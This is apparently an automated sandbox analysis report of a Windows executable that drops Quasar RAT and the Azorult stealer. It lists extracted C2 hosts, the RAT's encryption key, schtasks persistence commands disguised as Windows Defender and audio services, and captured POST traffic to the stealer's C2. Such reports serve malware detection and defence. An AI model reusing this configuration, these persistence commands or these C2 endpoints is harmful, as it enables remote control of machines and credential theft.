Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    4s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20240611-en
  • resource tags

    arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
  • submitted
    27/06/2024, 09:20 UTC

General

  • Target

    7346c3410e979ccebdc7e4f05ccb6b5690949e46e79aa0085060e4ecdb296de3_NeikiAnalytics.exe

  • Size

    2.0MB

  • MD5

    efebb862c00bc54b222906c378b7d630

  • SHA1

    220384eed32be0063bf476c584e3eb6891a414c9

  • SHA256

    7346c3410e979ccebdc7e4f05ccb6b5690949e46e79aa0085060e4ecdb296de3

  • SHA512

    192c53da7ff4beb7aa0f6d73d4ff45c1c746351c432186c1bd8d7da60eecb4a927c581f355897ce154f21ea3e1c9fefb798a05ddf41ab669baa51d50da1bfea4

  • SSDEEP

    24576:su6J33O0c+JY5UZ+XC0kGso6FaI1IXgM6YmenKKSUlmDaGJTA4Pqa6jUvOkQwKYh:2u0c++OCvkGs9Fap5aLKLkDl+dUvO9YP

Malware Config

Extracted

Family

quasar

Version

1.3.0.0

Botnet

EbayProfiles

C2

5.8.88.191:443

sockartek.icu:443

Mutex

QSR_MUTEX_0kBRNrRz5TDLEQouI0

Attributes
  • encryption_key

    MWhG6wsClMX8aJM2CVXT

  • install_name

    winsock.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    win defender run

  • subdirectory

    SubDir

Extracted

Family

azorult

C2

http://0x21.in:8000/_az/

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 5 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 8 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7346c3410e979ccebdc7e4f05ccb6b5690949e46e79aa0085060e4ecdb296de3_NeikiAnalytics.exe
    "C:\Users\Admin\AppData\Local\Temp\7346c3410e979ccebdc7e4f05ccb6b5690949e46e79aa0085060e4ecdb296de3_NeikiAnalytics.exe"
    1⤵
    • Loads dropped DLL
    • Enumerates connected drives
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2764
    • C:\Users\Admin\AppData\Local\Temp\vnc.exe
      "C:\Users\Admin\AppData\Local\Temp\vnc.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:2152
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k
        3⤵
        • Maps connected drives based on registry
        PID:2520
    • C:\Users\Admin\AppData\Local\Temp\windef.exe
      "C:\Users\Admin\AppData\Local\Temp\windef.exe"
      2⤵
      • Executes dropped EXE
      PID:2728
      • C:\Windows\SysWOW64\schtasks.exe
        "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\windef.exe" /rl HIGHEST /f
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:1312
      • C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe
        "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"
        3⤵
          PID:1780
          • C:\Windows\SysWOW64\schtasks.exe
            "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe" /rl HIGHEST /f
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:1840
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\Users\Admin\AppData\Local\Temp\h5rHJG1t3Khn.bat" "
            4⤵
              PID:2276
              • C:\Windows\SysWOW64\chcp.com
                chcp 65001
                5⤵
                  PID:2360
                • C:\Windows\SysWOW64\PING.EXE
                  ping -n 10 localhost
                  5⤵
                  • Runs ping.exe
                  PID:2272
                • C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe
                  "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"
                  5⤵
                    PID:2824
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1780 -s 1520
                  4⤵
                  • Program crash
                  PID:2308
            • C:\Users\Admin\AppData\Local\Temp\7346c3410e979ccebdc7e4f05ccb6b5690949e46e79aa0085060e4ecdb296de3_NeikiAnalytics.exe
              "C:\Users\Admin\AppData\Local\Temp\7346c3410e979ccebdc7e4f05ccb6b5690949e46e79aa0085060e4ecdb296de3_NeikiAnalytics.exe"
              2⤵
                PID:2628
              • C:\Windows\SysWOW64\schtasks.exe
                "C:\Windows\SysWOW64\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe" /sc minute /mo 1 /F
                2⤵
                • Scheduled Task/Job: Scheduled Task
                PID:2912
            • C:\Windows\system32\taskeng.exe
              taskeng.exe {95F856C4-AE5F-4D73-BE9E-3B045EFF3127} S-1-5-21-39690363-730359138-1046745555-1000:EILATWEW\Admin:Interactive:[1]
              1⤵
                PID:3012
                • C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe
                  C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe
                  2⤵
                    PID:2384
                    • C:\Users\Admin\AppData\Local\Temp\vnc.exe
                      "C:\Users\Admin\AppData\Local\Temp\vnc.exe"
                      3⤵
                        PID:1472
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k
                          4⤵
                            PID:2120
                        • C:\Users\Admin\AppData\Local\Temp\windef.exe
                          "C:\Users\Admin\AppData\Local\Temp\windef.exe"
                          3⤵
                            PID:1904
                          • C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe
                            "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe"
                            3⤵
                              PID:1756
                            • C:\Windows\SysWOW64\schtasks.exe
                              "C:\Windows\SysWOW64\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe" /sc minute /mo 1 /F
                              3⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:944

                        Network

                        • flag-us
                          DNS
                          0x21.in
                          7346c3410e979ccebdc7e4f05ccb6b5690949e46e79aa0085060e4ecdb296de3_NeikiAnalytics.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          0x21.in
                          IN A
                          Response
                          0x21.in
                          IN A
                          44.221.84.105
                        • flag-us
                          POST
                          http://0x21.in:8000/_az/
                          7346c3410e979ccebdc7e4f05ccb6b5690949e46e79aa0085060e4ecdb296de3_NeikiAnalytics.exe
                          Remote address:
                          44.221.84.105:8000
                          Request
                          POST /_az/ HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                          Host: 0x21.in:8000
                          Content-Length: 99
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx
                          Date: Thu, 27 Jun 2024 09:20:20 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: close
                          Set-Cookie: btst=; path=/; domain=.0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                          Set-Cookie: btst=; path=/; domain=0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                          Set-Cookie: btst=5272f1758c1a44984c867c6e2bf3c1de|191.101.209.39|1719480020|1719480020|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                          Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                        • flag-us
                          DNS
                          0x21.in
                          7346c3410e979ccebdc7e4f05ccb6b5690949e46e79aa0085060e4ecdb296de3_NeikiAnalytics.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          0x21.in
                          IN A
                          Response
                          0x21.in
                          IN A
                          44.221.84.105
                        • flag-us
                          POST
                          http://0x21.in/_az/
                          7346c3410e979ccebdc7e4f05ccb6b5690949e46e79aa0085060e4ecdb296de3_NeikiAnalytics.exe
                          Remote address:
                          44.221.84.105:8000
                          Request
                          POST /_az/ HTTP/1.0
                          Host: 0x21.in
                          Connection: close
                          User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                          Content-Length: 99
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx
                          Date: Thu, 27 Jun 2024 09:20:20 GMT
                          Content-Type: text/html
                          Connection: close
                          Set-Cookie: btst=eb20799ff5a9f3f424ac7f5002a57e51|191.101.209.39|1719480020|1719480020|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                          Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                        • flag-us
                          DNS
                          ip-api.com
                          Remote address:
                          8.8.8.8:53
                          Request
                          ip-api.com
                          IN A
                          Response
                          ip-api.com
                          IN A
                          208.95.112.1
                        • flag-us
                          GET
                          http://ip-api.com/json/
                          Remote address:
                          208.95.112.1:80
                          Request
                          GET /json/ HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                          Host: ip-api.com
                          Connection: Keep-Alive
                          Response
                          HTTP/1.1 200 OK
                          Date: Thu, 27 Jun 2024 09:20:22 GMT
                          Content-Type: application/json; charset=utf-8
                          Content-Length: 297
                          Access-Control-Allow-Origin: *
                          X-Ttl: 52
                          X-Rl: 42
                        • flag-us
                          GET
                          http://ip-api.com/json/
                          Remote address:
                          208.95.112.1:80
                          Request
                          GET /json/ HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                          Host: ip-api.com
                          Connection: Keep-Alive
                          Response
                          HTTP/1.1 200 OK
                          Date: Thu, 27 Jun 2024 09:20:24 GMT
                          Content-Type: application/json; charset=utf-8
                          Content-Length: 297
                          Access-Control-Allow-Origin: *
                          X-Ttl: 51
                          X-Rl: 41
                        • flag-us
                          DNS
                          sockartek.icu
                          Remote address:
                          8.8.8.8:53
                          Request
                          sockartek.icu
                          IN A
                          Response
                        • flag-us
                          DNS
                          0x21.in
                          7346c3410e979ccebdc7e4f05ccb6b5690949e46e79aa0085060e4ecdb296de3_NeikiAnalytics.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          0x21.in
                          IN A
                          Response
                          0x21.in
                          IN A
                          44.221.84.105
                        • flag-us
                          POST
                          http://0x21.in:8000/_az/
                          Remote address:
                          44.221.84.105:8000
                          Request
                          POST /_az/ HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                          Host: 0x21.in:8000
                          Content-Length: 99
                          Cache-Control: no-cache
                          Cookie: btst=5272f1758c1a44984c867c6e2bf3c1de|191.101.209.39|1719480020|1719480020|0|1|0; snkz=191.101.209.39
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx
                          Date: Thu, 27 Jun 2024 09:21:07 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: close
                          Set-Cookie: btst=; path=/; domain=.0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                          Set-Cookie: btst=; path=/; domain=0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                          Set-Cookie: btst=5272f1758c1a44984c867c6e2bf3c1de|191.101.209.39|1719480067|1719480020|23|2|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                        • flag-us
                          DNS
                          0x21.in
                          7346c3410e979ccebdc7e4f05ccb6b5690949e46e79aa0085060e4ecdb296de3_NeikiAnalytics.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          0x21.in
                          IN A
                          Response
                          0x21.in
                          IN A
                          44.221.84.105
                        • flag-us
                          POST
                          http://0x21.in/_az/
                          Remote address:
                          44.221.84.105:8000
                          Request
                          POST /_az/ HTTP/1.0
                          Host: 0x21.in
                          Connection: close
                          User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                          Content-Length: 99
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx
                          Date: Thu, 27 Jun 2024 09:21:08 GMT
                          Content-Type: text/html
                          Connection: close
                          Set-Cookie: btst=185150818deb5b364d66796c16e23b9e|191.101.209.39|1719480068|1719480068|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                          Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                        • 5.8.88.191:8080
                          svchost.exe
                          152 B
                          3
                        • 44.221.84.105:8000
                          http://0x21.in:8000/_az/
                          http
                          7346c3410e979ccebdc7e4f05ccb6b5690949e46e79aa0085060e4ecdb296de3_NeikiAnalytics.exe
                          482 B
                          870 B
                          5
                          5

                          HTTP Request

                          POST http://0x21.in:8000/_az/

                          HTTP Response

                          200
                        • 44.221.84.105:8000
                          http://0x21.in/_az/
                          http
                          7346c3410e979ccebdc7e4f05ccb6b5690949e46e79aa0085060e4ecdb296de3_NeikiAnalytics.exe
                          471 B
                          590 B
                          5
                          5

                          HTTP Request

                          POST http://0x21.in/_az/

                          HTTP Response

                          200
                        • 208.95.112.1:80
                          http://ip-api.com/json/
                          http
                          374 B
                          566 B
                          5
                          2

                          HTTP Request

                          GET http://ip-api.com/json/

                          HTTP Response

                          200
                        • 208.95.112.1:80
                          http://ip-api.com/json/
                          http
                          374 B
                          646 B
                          5
                          4

                          HTTP Request

                          GET http://ip-api.com/json/

                          HTTP Response

                          200
                        • 5.8.88.191:443
                          152 B
                          3
                        • 5.8.88.191:8080
                          152 B
                          3
                        • 5.8.88.191:8080
                          152 B
                          3
                        • 44.221.84.105:8000
                          http://0x21.in:8000/_az/
                          http
                          593 B
                          791 B
                          5
                          5

                          HTTP Request

                          POST http://0x21.in:8000/_az/

                          HTTP Response

                          200
                        • 44.221.84.105:8000
                          http://0x21.in/_az/
                          http
                          471 B
                          590 B
                          5
                          5

                          HTTP Request

                          POST http://0x21.in/_az/

                          HTTP Response

                          200
                        • 5.8.88.191:8080
                          152 B
                          3
                        • 5.8.88.191:8080
                          152 B
                          3
                        • 5.8.88.191:8080
                          152 B
                          3
                        • 5.8.88.191:8080
                          152 B
                          3
                        • 5.8.88.191:8080
                          152 B
                          3
                        • 5.8.88.191:8080
                          152 B
                          3
                        • 5.8.88.191:8080
                          152 B
                          3
                        • 8.8.8.8:53
                          0x21.in
                          dns
                          7346c3410e979ccebdc7e4f05ccb6b5690949e46e79aa0085060e4ecdb296de3_NeikiAnalytics.exe
                          53 B
                          69 B
                          1
                          1

                          DNS Request

                          0x21.in

                          DNS Response

                          44.221.84.105

                        • 8.8.8.8:53
                          0x21.in
                          dns
                          7346c3410e979ccebdc7e4f05ccb6b5690949e46e79aa0085060e4ecdb296de3_NeikiAnalytics.exe
                          53 B
                          69 B
                          1
                          1

                          DNS Request

                          0x21.in

                          DNS Response

                          44.221.84.105

                        • 8.8.8.8:53
                          ip-api.com
                          dns
                          56 B
                          72 B
                          1
                          1

                          DNS Request

                          ip-api.com

                          DNS Response

                          208.95.112.1

                        • 8.8.8.8:53
                          sockartek.icu
                          dns
                          59 B
                          124 B
                          1
                          1

                          DNS Request

                          sockartek.icu

                        • 8.8.8.8:53
                          0x21.in
                          dns
                          7346c3410e979ccebdc7e4f05ccb6b5690949e46e79aa0085060e4ecdb296de3_NeikiAnalytics.exe
                          53 B
                          69 B
                          1
                          1

                          DNS Request

                          0x21.in

                          DNS Response

                          44.221.84.105

                        • 8.8.8.8:53
                          0x21.in
                          dns
                          7346c3410e979ccebdc7e4f05ccb6b5690949e46e79aa0085060e4ecdb296de3_NeikiAnalytics.exe
                          53 B
                          69 B
                          1
                          1

                          DNS Request

                          0x21.in

                          DNS Response

                          44.221.84.105

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Local\Temp\h5rHJG1t3Khn.bat

                          Filesize

                          208B

                          MD5

                          2dbc9f43e9a5891a75670b976cda992b

                          SHA1

                          8c9824d30fd46272074dffeccd92fc7bf1e22bc8

                          SHA256

                          a4f09591c49f9d2dea0d23e140f345623806a3882668ff7a508177017e0b10f2

                          SHA512

                          bab37f661e93528e83c0f4d9fcc5741151beeb76be6726e36b6e668a5641b5c247d2c14e062b0ff0d92d48d8eaf95904275f4b92fa51f4117e246a8a946db927

                        • C:\Users\Admin\AppData\Local\Temp\windef.exe

                          Filesize

                          349KB

                          MD5

                          b4a202e03d4135484d0e730173abcc72

                          SHA1

                          01b30014545ea526c15a60931d676f9392ea0c70

                          SHA256

                          7050608d53f80269df951d00883ed79815c060ce7678a76b5c3f6a2a985beea9

                          SHA512

                          632a035a3b722ea29b02aad1f0da3df5bdc38abc7e6617223790955c6c0830f1070b528680416d5c63ea5e846074cdad87f06c21c35a77b1ccc4edc089d8b1fb

                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\Y1Z8QREW.txt

                          Filesize

                          211B

                          MD5

                          8c49e1714049dba4f569725e3fab779c

                          SHA1

                          f8f14c034af58bc7ddc80a522fdc062085ad0e76

                          SHA256

                          5cbf96c898d98fc1c736d7ef278e97929bb894ab9783ed277743a17d553fc979

                          SHA512

                          ef40cd95074e5fb5e7c2abc5e4eae3a226ad0f3822964f5173aa21c9e6211136a902baab3b778b6bec47626bbda4fad60cb46f1aecc0c8f901c5108ce10c68b1

                        • C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe

                          Filesize

                          2.0MB

                          MD5

                          22c3fbc0412a29cf17ac5ef9a06194cb

                          SHA1

                          d815ac3630126e2b6f56af654d7a0dac48d727d3

                          SHA256

                          b433de81c986b8f404b77e29e97e8b18a05881a3bd8788831b5539ae87f9fe94

                          SHA512

                          469e7abbce48536d4366ad1bb27df07096cd62f2f150f129fe5181267550376cfb2bbc2222f40c3f243242d717b629dae330487edfd7cfc1e14a183948159bf7

                        • \Users\Admin\AppData\Local\Temp\vnc.exe

                          Filesize

                          405KB

                          MD5

                          b8ba87ee4c3fc085a2fed0d839aadce1

                          SHA1

                          b3a2e3256406330e8b1779199bb2b9865122d766

                          SHA256

                          4e8a99cd33c9e5c747a3ce8f1a3e17824846f4a8f7cb0631aebd0815db2ce3a4

                          SHA512

                          7a775a12cd5bcd182d64be0d31f800b456ca6d1b531189cea9c72e1940871cfe92ccd005938f67bfa4784ae44c54b3a7ea29a5bb59766e98c78bf53b680f2ab2

                        • memory/1756-131-0x00000000000D0000-0x00000000000F0000-memory.dmp

                          Filesize

                          128KB

                        • memory/1756-127-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

                          Filesize

                          4KB

                        • memory/1756-124-0x00000000000D0000-0x00000000000F0000-memory.dmp

                          Filesize

                          128KB

                        • memory/1780-64-0x00000000003D0000-0x000000000042E000-memory.dmp

                          Filesize

                          376KB

                        • memory/1904-114-0x0000000000840000-0x000000000089E000-memory.dmp

                          Filesize

                          376KB

                        • memory/2120-118-0x0000000000410000-0x00000000004AC000-memory.dmp

                          Filesize

                          624KB

                        • memory/2120-117-0x000007FFFFFD6000-0x000007FFFFFD7000-memory.dmp

                          Filesize

                          4KB

                        • memory/2120-132-0x0000000000410000-0x00000000004AC000-memory.dmp

                          Filesize

                          624KB

                        • memory/2520-53-0x0000000000440000-0x00000000004DC000-memory.dmp

                          Filesize

                          624KB

                        • memory/2520-49-0x0000000000440000-0x00000000004DC000-memory.dmp

                          Filesize

                          624KB

                        • memory/2520-48-0x000007FFFFFD9000-0x000007FFFFFDA000-memory.dmp

                          Filesize

                          4KB

                        • memory/2520-46-0x0000000000020000-0x0000000000021000-memory.dmp

                          Filesize

                          4KB

                        • memory/2628-30-0x0000000000080000-0x00000000000A0000-memory.dmp

                          Filesize

                          128KB

                        • memory/2628-32-0x0000000000080000-0x00000000000A0000-memory.dmp

                          Filesize

                          128KB

                        • memory/2628-42-0x0000000000080000-0x00000000000A0000-memory.dmp

                          Filesize

                          128KB

                        • memory/2628-38-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

                          Filesize

                          4KB

                        • memory/2728-54-0x0000000000B40000-0x0000000000B9E000-memory.dmp

                          Filesize

                          376KB

                        • memory/2764-29-0x0000000001060000-0x0000000001061000-memory.dmp

                          Filesize

                          4KB

                        We care about your privacy.

                        This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.